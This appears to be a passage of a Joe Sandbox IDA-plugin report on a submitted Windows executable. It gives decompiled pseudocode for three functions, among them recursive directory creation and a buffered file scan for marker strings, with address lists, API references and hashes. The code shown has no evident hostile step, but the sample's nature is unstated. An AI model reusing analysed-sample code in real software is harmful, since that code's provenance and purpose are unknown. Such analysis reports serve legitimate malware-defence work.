				void* _t141;
				intOrPtr* _t151;
				signed int _t157;
				intOrPtr _t192;
				intOrPtr* _t196;
				long _t198;
				void* _t199;

				E00413954(E00419BC6, _t199);
				_t192 = __ecx;
				_t157 = 0;
				_push(0x90);
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(_t199 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				_t105 = E00403A76();
				 *((intOrPtr*)(_t199 - 0x18)) = _t105;
				 *(_t199 - 4) = 0;
				if(_t105 == 0) {
					_t196 = 0;
					__eflags = 0;
				} else {
					_t196 = E00409184(_t105);
				}
				 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t199 - 0x10)) = _t196;
				if(_t196 != _t157) {
					 *((intOrPtr*)( *_t196 + 4))(_t196);
				}
				 *((intOrPtr*)(_t196 + 0x7c)) =  *((intOrPtr*)(_t199 + 0x1c));
				 *(_t199 - 4) = 1;
				 *(_t199 - 0x3c) = _t157;
				 *(_t199 - 0x38) = _t157;
				 *(_t199 - 0x34) = _t157;
				E00402170(_t199 - 0x3c, 3);
				 *(_t199 - 4) = 2;
				 *(_t199 - 0x24) = _t157;
				 *(_t199 - 0x20) = _t157;
				 *(_t199 - 0x1c) = _t157;
				E00402170(_t199 - 0x24, 3);
				 *(_t199 - 4) = 3;
				 *(_t199 - 0x30) = _t157;
				 *(_t199 - 0x2c) = _t157;
				 *(_t199 - 0x28) = _t157;
				E00402170(_t199 - 0x30, 3);
				 *(_t199 - 4) = 4;
				if( *((intOrPtr*)(_t199 + 0x14)) != _t157 ||  *((intOrPtr*)(_t199 + 0x10)) != _t157) {
					_t58 = _t196 + 8; // 0x8
					 *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)) + 0xc))(_t58,  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))));
					goto L13;
				} else {
					_push(_t199 + 0x1c);
					if(E00404E76( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))), _t199 - 0x3c) != 0) {
						_t137 = E00401E3A(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 5;
						E00401D7A(_t199 - 0x24, _t137);
						 *(_t199 - 4) = 4;
						E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
						_t141 = E00401E19(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 6;
						E00401D7A(_t199 - 0x30, _t141);
						 *(_t199 - 4) = 4;
						E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
						_push(_t199 - 0x30);
						_push(_t199 - 0x24);
						E004092E9(_t196, __eflags); // executed
						L13:
						_push( *((intOrPtr*)(_t199 - 0x10)));
						_push( *((intOrPtr*)(_t199 + 0x18)));
						_t62 = _t199 + 0x14; // 0x414be4
						_push( *_t62);
						_push( *((intOrPtr*)(_t199 + 0x10)));
						_push( *((intOrPtr*)(_t199 + 0xc)));
						_push( *((intOrPtr*)(_t199 + 8)));
						_t113 = E00408A3B(_t192); // executed
						__eflags = _t113 - _t157;
						 *((intOrPtr*)(_t199 + 0x18)) = _t113;
						if(_t113 == _t157) {
							_push(_t199 - 0x30);
							_t115 = E00402634(_t199 - 0x48, _t199 - 0x24);
							_t193 = _t192 + 0x14;
							_push(_t115);
							 *(_t199 - 4) = 7;
							E00403998(_t192 + 0x14);
							 *(_t199 - 4) = 4;
							E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
							__eflags =  *((intOrPtr*)(_t196 + 0x70)) - _t157;
							if( *((intOrPtr*)(_t196 + 0x70)) > _t157) {
								do {
									_push( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x74)) + _t157 * 4)));
									_push(E00402634(_t199 - 0x48, _t199 - 0x24));
									 *(_t199 - 4) = 8;
									E00403998(_t193);
									 *(_t199 - 4) = 4;
									E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
									_t157 = _t157 + 1;
									__eflags = _t157 -  *((intOrPtr*)(_t196 + 0x70));
								} while (_t157 <  *((intOrPtr*)(_t196 + 0x70)));
							}
							_t118 =  *((intOrPtr*)(_t199 - 0x14));
							 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t196 + 0x88));
							 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t196 + 0x8c));
							E00403A9C( *(_t199 - 0x30));
							E00403A9C( *(_t199 - 0x24));
							E00403A9C( *(_t199 - 0x3c));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							E00403800(_t199 - 0x10);
							_t123 = 0;
							__eflags = 0;
						} else {
							E00403A9C( *(_t199 - 0x30));
							E00403A9C( *(_t199 - 0x24));
							E00403A9C( *(_t199 - 0x3c));
							_t131 =  *((intOrPtr*)(_t199 - 0x10));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							__eflags = _t131 - _t157;
							if(_t131 != _t157) {
								 *((intOrPtr*)( *_t131 + 8))(_t131);
							}
							_t123 =  *((intOrPtr*)(_t199 + 0x18));
						}
					} else {
						_t198 = GetLastError();
						E00403A9C( *(_t199 - 0x30));
						E00403A9C( *(_t199 - 0x24));
						E00403A9C( *(_t199 - 0x3c));
						_t151 =  *((intOrPtr*)(_t199 - 0x10));
						 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
						if(_t151 != _t157) {
							 *((intOrPtr*)( *_t151 + 8))(_t151);
						}
						_t123 = _t198;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t199 - 0xc));
				return _t123;
			}

















                              0x00408f0f
                              0x00408f1a
                              0x00408f1c
                              0x00408f1e
                              0x00408f23
                              0x00408f26
                              0x00408f29
                              0x00408f2c
                              0x00408f32
                              0x00408f37
                              0x00408f3a
                              0x00408f47
                              0x00408f47
                              0x00408f3c
                              0x00408f43
                              0x00408f43
                              0x00408f49
                              0x00408f4f
                              0x00408f52
                              0x00408f57
                              0x00408f57
                              0x00408f5f
                              0x00408f65
                              0x00408f6c
                              0x00408f6f
                              0x00408f72
                              0x00408f75
                              0x00408f7f
                              0x00408f83
                              0x00408f86
                              0x00408f89
                              0x00408f8c
                              0x00408f96
                              0x00408f9a
                              0x00408f9d
                              0x00408fa0
                              0x00408fa3
                              0x00408fab
                              0x00408faf
                              0x00409079
                              0x0040907e
                              0x00000000
                              0x00408fbe
                              0x00408fc9
                              0x00408fd1
                              0x00409018
                              0x00409021
                              0x00409025
                              0x0040902d
                              0x00409031
                              0x00409041
                              0x0040904a
                              0x0040904e
                              0x00409056
                              0x0040905a
                              0x00409063
                              0x00409067
                              0x0040906a
                              0x00409081
                              0x00409081
                              0x00409086
                              0x00409089
                              0x00409089
                              0x0040908c
                              0x0040908f
                              0x00409092
                              0x00409095
                              0x0040909a
                              0x0040909c
                              0x0040909f
                              0x004090db
                              0x004090df
                              0x004090e4
                              0x004090e7
                              0x004090ea
                              0x004090ee
                              0x004090f6
                              0x004090fa
                              0x004090ff
                              0x00409103
                              0x00409105
                              0x0040910e
                              0x00409116
                              0x00409119
                              0x0040911d
                              0x00409125
                              0x00409129
                              0x0040912e
                              0x00409130
                              0x00409130
                              0x00409105
                              0x00409135
                              0x00409141
                              0x0040914a
                              0x0040914d
                              0x00409155
                              0x0040915d
                              0x00409162
                              0x0040916c
                              0x00409171
                              0x00409171
                              0x004090a1
                              0x004090a4
                              0x004090ac
                              0x004090b4
                              0x004090b9
                              0x004090bc
                              0x004090c3
                              0x004090c5
                              0x004090ca
                              0x004090ca
                              0x004090cd
                              0x004090cd
                              0x00408fd3
                              0x00408fdc
                              0x00408fde
                              0x00408fe6
                              0x00408fee
                              0x00408ff3
                              0x00408ff6
                              0x00408fff
                              0x00409004
                              0x00409004
                              0x00409007
                              0x00409007
                              0x00408fd1
                              0x00409179
                              0x00409181

                              APIs
                              • __EH_prolog.LIBCMT ref: 00408F0F
                              • GetLastError.KERNEL32(?,00000003,00000003,00000003,?,?,00000000), ref: 00408FD3
                                • Part of subcall function 00409184: __EH_prolog.LIBCMT ref: 00409189
                                • Part of subcall function 004092E9: __EH_prolog.LIBCMT ref: 004092EE
                                • Part of subcall function 00408A3B: __EH_prolog.LIBCMT ref: 00408A40
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$ErrorLast
                              • String ID: KA
                              • API String ID: 2901101390-4133974868
                              • Opcode ID: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
                              • Instruction ID: 1ffdda1e280707f1620b0bff2a1c5a648dc862d45b7bd7d33f28712355ced64d
                              • Opcode Fuzzy Hash: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
                              • Instruction Fuzzy Hash: 7C81677190020AABCF01EFA5C885ADEBBB5BF18318F14416EF455B32A2CB399A05CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004049DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 941 4049dd-404a02 call 413954 call 401c80 946 404a04-404a07 941->946 947 404a4a-404a59 call 401ce1 941->947 949 404a0b-404a0e 946->949 953 404a5d-404a67 call 40499c 947->953 951 404a10-404a12 949->951 952 404a18-404a1c 949->952 954 404a14-404a16 951->954 955 404a1e 951->955 956 404a21-404a23 952->956 963 404b42-404b49 call 401d7a 953->963 964 404a6d-404a78 GetLastError 953->964 954->949 955->956 956->947 958 404a25-404a2a 956->958 958->947 959 404a2c-404a2f 958->959 961 404a31-404a36 959->961 962 404a3f-404a45 call 4023ee 959->962 961->962 966 404a38-404a3a 961->966 962->947 970 404b4e-404b51 963->970 968 404aea-404afc call 402ee1 call 405841 964->968 969 404a7a-404a7f 964->969 971 404bc0-404bc6 call 403a9c 966->971 989 404b01-404b03 968->989 972 404bb2 969->972 973 404a85-404a88 969->973 975 404b57-404b5a 970->975 976 404bd8-404bda 970->976 994 404bc7-404bd7 971->994 977 404bb4-404bbf call 403a9c 972->977 979 404a8c-404a8f 973->979 982 404b5e-404b64 975->982 976->977 977->971 985 404a91-404a93 979->985 986 404a99-404a9f 979->986 991 404b66-404b69 982->991 992 404b6f-404b75 982->992 987 404aa1 985->987 988 404a95-404a97 985->988 990 404aa4-404aa6 986->990 987->990 988->979 995 404b05-404b07 989->995 996 404b09-404b11 989->996 990->972 997 404aac 990->997 998 404b77 991->998 999 404b6b-404b6d 991->999 1000 404b7a-404b7c 992->1000 1001 404b15-404b30 call 403a9c * 3 995->1001 1002 404b13 996->1002 1003 404b35-404b41 call 403a9c 996->1003 997->972 1004 404ab2-404ab8 997->1004 998->1000 999->982 1005 404b81-404bb0 call 401e3a call 40499c call 403a9c 1000->1005 1006 404b7e 1000->1006 1001->994 1002->1001 1003->963 1004->972 1008 404abe-404ae5 call 401e3a call 401d7a call 403a9c 1004->1008 1005->970 1005->972 1006->1005 1008->953
                              C-Code - Quality: 98%
                              			E004049DD(void* __ecx) {
				signed int _t64;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed char _t75;
				long _t78;
				signed int _t80;
				signed char _t82;
				signed int _t87;
				intOrPtr* _t88;
				void* _t92;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t109;
				signed int _t116;
				intOrPtr _t123;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				void* _t132;
				signed int _t135;
				void* _t138;

				E00413954(E004195A0, _t138);
				E00401C80(_t138 - 0x18, __ecx);
				_t2 = _t138 - 0x14; // 0x414be4
				_t109 =  *_t2;
				 *(_t138 - 4) =  *(_t138 - 4) & 0x00000000;
				_t132 = 0x5c;
				if(_t109 == 0) {
					L13:
					E00401CE1(_t138 - 0x24, _t138 - 0x18);
					_t14 = _t138 - 0x14; // 0x414be4
					_t135 =  *_t14;
					 *(_t138 - 4) = 1;
					while(1) {
						L14:
						_t64 = E0040499C( *((intOrPtr*)(_t138 - 0x18))); // executed
						__eflags = _t64;
						if(_t64 != 0) {
							break;
						}
						_t78 = GetLastError();
						__eflags = _t78 - 0xb7;
						if(_t78 == 0xb7) {
							E00402EE1(_t138 - 0x40);
							_push( *((intOrPtr*)(_t138 - 0x18)));
							 *(_t138 - 4) = 2;
							_t80 = E00405841(_t138 - 0x68, _t128); // executed
							__eflags = _t80;
							if(_t80 != 0) {
								_t82 =  *(_t138 - 0x48) >> 4;
								__eflags = _t82 & 0x00000001;
								if((_t82 & 0x00000001) != 0) {
									 *(_t138 - 4) = 1;
									E00403A9C( *((intOrPtr*)(_t138 - 0x40)));
									break;
								} else {
									_t102 = 0;
									__eflags = 0;
									goto L31;
								}
							} else {
								_t102 = 1;
								L31:
								E00403A9C( *((intOrPtr*)(_t138 - 0x40)));
								E00403A9C( *((intOrPtr*)(_t138 - 0x24)));
								E00403A9C( *((intOrPtr*)(_t138 - 0x18)));
							}
						} else {
							_t17 = _t138 - 0x14; // 0x414be4
							_t87 =  *_t17;
							__eflags = _t87;
							if(_t87 == 0) {
								L44:
								_t102 = 0;
								__eflags = 0;
								L45:
								E00403A9C( *((intOrPtr*)(_t138 - 0x24)));
								_t129 =  *((intOrPtr*)(_t138 - 0x18));
								goto L46;
							} else {
								_t123 =  *((intOrPtr*)(_t138 - 0x18));
								_t88 = _t123 + _t87 * 2 - 2;
								while(1) {
									__eflags =  *_t88 - _t132;
									if( *_t88 == _t132) {
										break;
									}
									__eflags = _t88 - _t123;
									if(_t88 == _t123) {
										_t135 = _t135 | 0xffffffff;
										__eflags = _t135;
									} else {
										_t88 = _t88;
										continue;
									}
									L23:
									__eflags = _t135;
									if(__eflags < 0 || __eflags == 0) {
										goto L44;
									} else {
										__eflags =  *((short*)(_t123 + _t135 * 2 - 2)) - 0x3a;
										if( *((short*)(_t123 + _t135 * 2 - 2)) == 0x3a) {
											goto L44;
										} else {
											_t92 = E00401E3A(_t138 - 0x18, _t138 - 0x30, _t135);
											 *(_t138 - 4) = 3;
											E00401D7A(_t138 - 0x18, _t92);
											 *(_t138 - 4) = 1;
											E00403A9C( *((intOrPtr*)(_t138 - 0x30)));
											goto L14;
										}
									}
									goto L47;
								}
								_t135 = _t88 - _t123 >> 1;
								goto L23;
							}
						}
						goto L47;
					}
					E00401D7A(_t138 - 0x18, _t138 - 0x24);
					while(1) {
						L34:
						_t45 = _t138 - 0x14; // 0x414be4
						__eflags = _t135 -  *_t45;
						if(_t135 >=  *_t45) {
							break;
						}
						_t130 =  *((intOrPtr*)(_t138 - 0x18));
						_t70 = _t130 + 2 + _t135 * 2;
						while(1) {
							_t116 =  *_t70;
							__eflags = _t116 - _t132;
							if(_t116 == _t132) {
								break;
							}
							__eflags = _t116;
							if(_t116 == 0) {
								_t135 = _t135 | 0xffffffff;
								__eflags = _t135;
							} else {
								_t70 = _t70 + 2;
								continue;
							}
							L41:
							__eflags = _t135;
							if(_t135 < 0) {
								_t50 = _t138 - 0x14; // 0x414be4
								_t135 =  *_t50;
							}
							_t74 = E00401E3A(_t138 - 0x18, _t138 - 0x30, _t135);
							 *(_t138 - 4) = 4;
							_t75 = E0040499C( *_t74);
							 *(_t138 - 4) = 1;
							asm("sbb bl, bl");
							E00403A9C( *((intOrPtr*)(_t138 - 0x30)));
							__eflags =  ~_t75 + 1;
							if( ~_t75 + 1 == 0) {
								goto L34;
							} else {
								goto L44;
							}
							goto L45;
						}
						_t135 = _t70 - _t130 >> 1;
						goto L41;
					}
					_t102 = 1;
					goto L45;
				} else {
					_t128 =  *((intOrPtr*)(_t138 - 0x18));
					_t96 = _t128 + _t109 * 2 - 2;
					while( *_t96 != _t132) {
						if(_t96 == _t128) {
							_t98 = _t96 | 0xffffffff;
							__eflags = _t98;
						} else {
							_t96 = _t96;
							continue;
						}
						L7:
						__eflags = _t98;
						if(_t98 <= 0) {
							goto L13;
						} else {
							__eflags = _t98 - _t109 - 1;
							if(_t98 != _t109 - 1) {
								goto L13;
							} else {
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									L12:
									E004023EE(_t138 - 0x18, _t98, 1);
									goto L13;
								} else {
									__eflags =  *((short*)(_t128 + 2)) - 0x3a;
									if( *((short*)(_t128 + 2)) != 0x3a) {
										goto L12;
									} else {
										_t102 = 1;
										L46:
										E00403A9C(_t129);
									}
								}
							}
						}
						goto L47;
					}
					_t98 = _t96 - _t128 >> 1;
					goto L7;
				}
				L47:
				 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
				return _t102;
			}

























                              0x004049e2
                              0x004049f1
                              0x004049f6
                              0x004049f6
                              0x004049f9
                              0x00404a01
                              0x00404a02
                              0x00404a4a
                              0x00404a51
                              0x00404a56
                              0x00404a56
                              0x00404a59
                              0x00404a5d
                              0x00404a5d
                              0x00404a60
                              0x00404a65
                              0x00404a67
                              0x00000000
                              0x00000000
                              0x00404a6d
                              0x00404a73
                              0x00404a78
                              0x00404aed
                              0x00404af2
                              0x00404af8
                              0x00404afc
                              0x00404b01
                              0x00404b03
                              0x00404b0c
                              0x00404b0f
                              0x00404b11
                              0x00404b38
                              0x00404b3c
                              0x00000000
                              0x00404b13
                              0x00404b13
                              0x00404b13
                              0x00000000
                              0x00404b13
                              0x00404b05
                              0x00404b05
                              0x00404b15
                              0x00404b18
                              0x00404b20
                              0x00404b28
                              0x00404b2d
                              0x00404a7a
                              0x00404a7a
                              0x00404a7a
                              0x00404a7d
                              0x00404a7f
                              0x00404bb2
                              0x00404bb2
                              0x00404bb2
                              0x00404bb4
                              0x00404bb7
                              0x00404bbc
                              0x00000000
                              0x00404a85
                              0x00404a85
                              0x00404a88
                              0x00404a8c
                              0x00404a8c
                              0x00404a8f
                              0x00000000
                              0x00000000
                              0x00404a91
                              0x00404a93
                              0x00404aa1
                              0x00404aa1
                              0x00404a95
                              0x00404a96
                              0x00000000
                              0x00404a96
                              0x00404aa4
                              0x00404aa4
                              0x00404aa6
                              0x00000000
                              0x00404ab2
                              0x00404ab2
                              0x00404ab8
                              0x00000000
                              0x00404abe
                              0x00404ac6
                              0x00404acf
                              0x00404ad3
                              0x00404ad8
                              0x00404adf
                              0x00000000
                              0x00404ae4
                              0x00404ab8
                              0x00000000
                              0x00404aa6
                              0x00404a9d
                              0x00000000
                              0x00404a9d
                              0x00404a7f
                              0x00000000
                              0x00404a78
                              0x00404b49
                              0x00404b4e
                              0x00404b4e
                              0x00404b4e
                              0x00404b4e
                              0x00404b51
                              0x00000000
                              0x00000000
                              0x00404b57
                              0x00404b5a
                              0x00404b5e
                              0x00404b5e
                              0x00404b61
                              0x00404b64
                              0x00000000
                              0x00000000
                              0x00404b66
                              0x00404b69
                              0x00404b77
                              0x00404b77
                              0x00404b6b
                              0x00404b6c
                              0x00000000
                              0x00404b6c
                              0x00404b7a
                              0x00404b7a
                              0x00404b7c
                              0x00404b7e
                              0x00404b7e
                              0x00404b7e
                              0x00404b89
                              0x00404b90
                              0x00404b94
                              0x00404b9b
                              0x00404ba4
                              0x00404ba8
                              0x00404bad
                              0x00404bb0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00404bb0
                              0x00404b73
                              0x00000000
                              0x00404b73
                              0x00404bd8
                              0x00000000
                              0x00404a04
                              0x00404a04
                              0x00404a07
                              0x00404a0b
                              0x00404a12
                              0x00404a1e
                              0x00404a1e
                              0x00404a14
                              0x00404a15
                              0x00000000
                              0x00404a15
                              0x00404a21
                              0x00404a21
                              0x00404a23
                              0x00000000
                              0x00404a25
                              0x00404a28
                              0x00404a2a
                              0x00000000
                              0x00404a2c
                              0x00404a2c
                              0x00404a2f
                              0x00404a3f
                              0x00404a45
                              0x00000000
                              0x00404a31
                              0x00404a31
                              0x00404a36
                              0x00000000
                              0x00404a38
                              0x00404a38
                              0x00404bc0
                              0x00404bc1
                              0x00404bc6
                              0x00404a36
                              0x00404a2f
                              0x00404a2a
                              0x00000000
                              0x00404a23
                              0x00404a1a
                              0x00000000
                              0x00404a1a
                              0x00404bc7
                              0x00404bcf
                              0x00404bd7

                              APIs
                              • __EH_prolog.LIBCMT ref: 004049E2
                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00404A6D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorH_prologLast
                              • String ID: KA
                              • API String ID: 1057991267-4133974868
                              • Opcode ID: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                              • Instruction ID: ea88e0dbf276ed2b61ac96949af9a946984d9cda694903235269fb2a0f105987
                              • Opcode Fuzzy Hash: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                              • Instruction Fuzzy Hash: 14512671A4010A9ACF10EBA0C945AFFBB74EF91318F14017BE601732D1D779AE46CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401AF4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1028 401af4-401b2e call 413954 call 413cc0 call 405b6d 1035 401b30-401b3e call 405975 1028->1035 1036 401b43-401b49 1028->1036 1043 401c6b-401c78 1035->1043 1038 401b57-401b60 1036->1038 1039 401b4b-401b55 1036->1039 1041 401b62-401b6c 1038->1041 1042 401b6e-401b7b 1038->1042 1039->1038 1039->1039 1041->1041 1041->1042 1044 401b7f-401b96 call 405bca 1042->1044 1046 401b9b-401b9d 1044->1046 1047 401ba3-401ba8 1046->1047 1048 401c5a 1046->1048 1050 401c56-401c58 1047->1050 1051 401bae-401bb0 1047->1051 1049 401c5c-401c6a call 405975 1048->1049 1049->1043 1050->1049 1053 401bb6-401bbc 1051->1053 1055 401bf0-401bf5 1053->1055 1056 401bbe-401bc3 1053->1056 1057 401c16-401c3b call 413980 1055->1057 1058 401bf7-401c08 call 4134d0 1055->1058 1056->1057 1059 401bc5-401bd6 call 4134d0 1056->1059 1069 401c4a-401c54 1057->1069 1070 401c3d-401c44 1057->1070 1067 401c0a-401c14 1058->1067 1068 401bec-401bee 1058->1068 1059->1050 1066 401bd8-401bdf 1059->1066 1066->1048 1071 401be1-401be7 call 401ee5 1066->1071 1067->1053 1068->1053 1069->1049 1070->1069 1072 401b7d 1070->1072 1071->1068 1072->1044
                              C-Code - Quality: 93%
                              			E00401AF4(void* __ecx, intOrPtr __edx, void* __eflags) {
				signed char** _t64;
				char* _t67;
				void* _t71;
				signed int _t73;
				intOrPtr _t74;
				void* _t75;
				void* _t81;
				void* _t83;
				char _t84;
				signed int _t89;
				signed int _t91;
				void* _t92;
				signed int _t103;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t112;

				_t92 = __ecx;
				E00413954(E004190C8, _t110);
				E00413CC0(0x1024, __ecx);
				_t64 =  *(_t110 + 0xc);
				_t103 = 0;
				_t64[1] = 0;
				 *((intOrPtr*)(_t110 - 0x30)) = __edx;
				 *( *_t64) =  *( *_t64) & 0x00000000;
				 *(_t110 - 0x1c) =  *(_t110 - 0x1c) | 0xffffffff;
				 *(_t110 - 4) = 0;
				if(E00405B6D(_t92) != 0) {
					 *((intOrPtr*)(_t110 - 0x14)) = 0;
					if( *((char*)(__edx)) != 0) {
						do {
							 *((intOrPtr*)(_t110 - 0x14)) =  *((intOrPtr*)(_t110 - 0x14)) + 1;
						} while ( *((char*)( *((intOrPtr*)(_t110 - 0x14)) + __edx)) != 0);
					}
					_t67 =  *((intOrPtr*)(_t110 + 8));
					 *((intOrPtr*)(_t110 - 0x18)) = _t103;
					if( *_t67 != 0) {
						do {
							 *((intOrPtr*)(_t110 - 0x18)) =  *((intOrPtr*)(_t110 - 0x18)) + 1;
						} while ( *((char*)( *((intOrPtr*)(_t110 - 0x18)) + _t67)) != 0);
					}
					_t107 = 0;
					 *(_t110 - 0xd) =  *(_t110 - 0xd) & 0x00000000;
					 *((intOrPtr*)(_t110 - 0x24)) = _t103;
					 *((intOrPtr*)(_t110 - 0x20)) = _t103;
					while(1) {
						L8:
						_t71 = E00405BCA(_t110 - 0x1c, _t110 + _t107 - 0x1030, 0x1000 - _t107, _t110 - 0x28); // executed
						if(_t71 == 0) {
							break;
						}
						_t74 =  *((intOrPtr*)(_t110 - 0x28));
						if(_t74 == _t103) {
							L23:
							_t89 = 1;
						} else {
							_t109 = _t107 + _t74;
							_t91 = _t110 - 0x1030;
							while(1) {
								_t75 = _t109;
								if( *(_t110 - 0xd) != 0) {
								}
								L12:
								if(_t103 > _t75 -  *((intOrPtr*)(_t110 - 0x18))) {
									L20:
									_t107 = _t109 - _t103;
									 *((intOrPtr*)(_t110 - 0x24)) =  *((intOrPtr*)(_t110 - 0x24)) + _t103;
									asm("adc dword [ebp-0x20], 0x0");
									E00413980(_t110 - 0x1030, _t110 + _t103 - 0x1030, _t107);
									_t112 = _t112 + 0xc;
									if( *((intOrPtr*)(_t110 - 0x20)) > 0 ||  *((intOrPtr*)(_t110 - 0x24)) > 0x100000) {
										_t89 = _t91 & 0xffffff00 | ( *(_t110 + 0xc))[1] == 0x00000000;
									} else {
										_t103 = 0;
										goto L8;
									}
								} else {
									_t83 = E004134D0(_t91,  *((intOrPtr*)(_t110 + 8)),  *((intOrPtr*)(_t110 - 0x18)));
									_t112 = _t112 + 0xc;
									if(_t83 == 0) {
										goto L23;
									} else {
										_t84 =  *_t91;
										 *((char*)(_t110 - 0x2c)) = _t84;
										if(_t84 == 0) {
											goto L24;
										} else {
											E00401EE5( *(_t110 + 0xc),  *((intOrPtr*)(_t110 - 0x2c)));
											L16:
											_t103 = _t103 + 1;
											_t91 = _t91 + 1;
											while(1) {
												_t75 = _t109;
												if( *(_t110 - 0xd) != 0) {
												}
												goto L17;
											}
											goto L12;
										}
									}
								}
								goto L25;
								L17:
								_t39 = _t110 - 0x14; // 0x414be4
								if(_t103 > _t75 -  *_t39) {
									goto L20;
								} else {
									_t40 = _t110 - 0x14; // 0x414be4
									_t81 = E004134D0(_t91,  *((intOrPtr*)(_t110 - 0x30)),  *_t40);
									_t112 = _t112 + 0xc;
									if(_t81 != 0) {
										goto L16;
									} else {
										_t103 = _t103 +  *((intOrPtr*)(_t110 - 0x14));
										_t91 = _t91 +  *((intOrPtr*)(_t110 - 0x14));
										 *(_t110 - 0xd) = 1;
										continue;
									}
									goto L26;
								}
								goto L25;
							}
						}
						L25:
						 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
						E00405975(_t110 - 0x1c);
						_t73 = _t89;
						goto L26;
					}
					L24:
					_t89 = 0;
					goto L25;
				} else {
					 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
					E00405975(_t110 - 0x1c);
					_t73 = 0;
				}
				L26:
				 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
				return _t73;
			}




















                              0x00401af4
                              0x00401af9
                              0x00401b03
                              0x00401b08
                              0x00401b0d
                              0x00401b11
                              0x00401b16
                              0x00401b19
                              0x00401b1c
                              0x00401b24
                              0x00401b2e
                              0x00401b46
                              0x00401b49
                              0x00401b4b
                              0x00401b4b
                              0x00401b51
                              0x00401b4b
                              0x00401b57
                              0x00401b5a
                              0x00401b60
                              0x00401b62
                              0x00401b62
                              0x00401b68
                              0x00401b62
                              0x00401b6e
                              0x00401b70
                              0x00401b75
                              0x00401b78
                              0x00401b7f
                              0x00401b7f
                              0x00401b96
                              0x00401b9d
                              0x00000000
                              0x00000000
                              0x00401ba3
                              0x00401ba8
                              0x00401c56
                              0x00401c56
                              0x00401bae
                              0x00401bae
                              0x00401bb0
                              0x00401bb6
                              0x00401bba
                              0x00401bbc
                              0x00401bbc
                              0x00401bbe
                              0x00401bc3
                              0x00401c16
                              0x00401c16
                              0x00401c18
                              0x00401c2a
                              0x00401c2f
                              0x00401c34
                              0x00401c3b
                              0x00401c51
                              0x00401b7d
                              0x00401b7d
                              0x00000000
                              0x00401b7d
                              0x00401bc5
                              0x00401bcc
                              0x00401bd1
                              0x00401bd6
                              0x00000000
                              0x00401bd8
